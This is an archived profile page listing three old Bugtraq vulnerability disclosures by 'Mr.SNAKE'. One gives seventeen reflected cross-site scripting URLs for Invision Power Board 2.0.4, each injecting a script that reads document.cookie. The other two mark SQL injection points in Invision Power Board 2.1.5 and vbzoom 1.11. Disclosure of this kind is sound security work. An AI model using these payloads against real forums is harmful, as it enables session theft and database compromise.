Grokbase
Topics Posts Groups | in
x
[ help ]

???? ???? (mr_sna...@hotmail.com)

Profile | Posts (3)

User Information

Display Name:???? ????
Partial Email Address:mr_sna...@hotmail.com
Posts:
3 total
3 in Bugtraq

3 Most Recent

1) ???? ???? XSS IN Invision Power Board
| +1 vote
Software: Invision Power Board Web Site:http://www.invisionpower.com tested in v2.0.4 exploit :...
Bugtraq
[ Profile | Reply to group ] [ Flat  Thread  Threaded ]
Software: Invision Power Board

Web Site:http://www.invisionpower.com

tested in v2.0.4


exploit :

forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in=ooo&result_type='><script>alert(document.cookie)</script>

forum/index.php?act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in='><script>alert(document.cookie)</script>&result_type=posts

foum/index.php?act=Search&nav='><script>alert(document.cookie)</script>

forum/index.php?showtopic=1&st='><script>alert(document.cookie)</script>

forum/index.php?s=504b8a357b04e1b276f08a039955177f&act=Search&nav=au&CODE=show&searchid=5f25843edb0242889889796819a2b367&search_in='><script>alert(document.cookie)</script>\

forum/index.php?s=21355e75e21dcc4c04e24c5c7247b220&act=Search&CODE=01&forums='><script>alert(document.cookie)</script>

forum/index.php?s='><script>alert(document.cookie)</script>&act=Search&CODE=01&forums=all

forum/index.php?act=calendar&code=birthdays&y=[any
year]&m='><script>alert(document.cookie)</script>&d=[any day]

forum/index.php?act=calendar&code=birthdays&y='><script>alert(document.cookie)</script>&m=[any
month]&d=[any day]

forum/index.php?act=calendar&code=birthdays&y=[any year]&m=[any
month]&d='><script>alert(document.cookie)</script>

forum/index.php?act=Print&client=printer&f=1&t='><script>alert(document.cookie)</script>

forum/index.php?act=Mail&CODE=00&MID='><script>alert(document.cookie)</script>

forum/index.php?act=Help&CODE=01&HID='><script>alert(document.cookie)</script>

forum/index.php?act=search&CODE=getnew&active='><script>alert(document.cookie)</script>&lastdate=1

forum/index.php?act=Members&max_results=10&sort_key=posts&sort_order='><script>alert(document.cookie)</script>

forum/index.php?act=Members&max_results='><script>alert(document.cookie)</script>&sort_key=posts&sort_order=desc

forum/index.php?act=Members&max_results=10&sort_key='><script>alert(document.cookie)</script>&sort_order=desc&sort_order=desc


all 17 XSS are tested in v2.0.4

Discovered by: Mr.SNAKE

GreeTz : T0 mY a11 Fr!nD in www.lezr.com

special thnx for pppppp

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search!
http://search.msn.com/
2) ???? ???? SQL injection in Invision Power Board v2.1.5
| +1 vote
SQL injection in Invision Power Board v2.1.5 Software: Invision Power Board Web Site :...
Bugtraq
[ Profile | Reply to group ] [ Flat  Thread  Threaded ]
SQL injection in Invision Power Board v2.1.5



Software: Invision Power Board

Web Site : http://forums.invisionpower.com

Versions: v2.1.5

Type: SQL Injection

Class: Remote

example :

http://www.victem.com/forum/index.php?showtopic=[anytopic]&pid=1&st=-1[sql]

Discovered by : Mr.SNAKE

GreeTz : greetz to all my freind in www.lezr.com

_________________________________________________________________
Don't just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/
3) ???? ???? SQL injection & XSS IN vbzoom v1.11
| +1 vote
Software: vbzoom v1.11 Web Site:http://www.vbzoom.com Versions: V1.11 == SQL Injection ==...
Bugtraq
[ Profile | Reply to group ] [ Flat  Thread  Threaded ]
Software: vbzoom v1.11

Web Site:http://www.vbzoom.com

Versions: V1.11

== SQL Injection ==

http://www.victem.com/vz/show.php?UserID=1&MainID=1&SubjectID=[SQL]

http://www.victem.com/vz/show.php?UserID=1&MainID=[SQL]&SubjectID=1

==== XSS ====

http://www.victem.com/vz/comment.php?UserID='>XSS

http://www.victem.com/vz/profile.php?UserID=1&UserName='>XSS

http://www.victem.com/vz/contact.php?UserID='>XSS


Discovered by: Mr.SNAKE

FROM http://www.lezr.com

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

spacer
Profile | Posts (3)
Home > People > ???? ????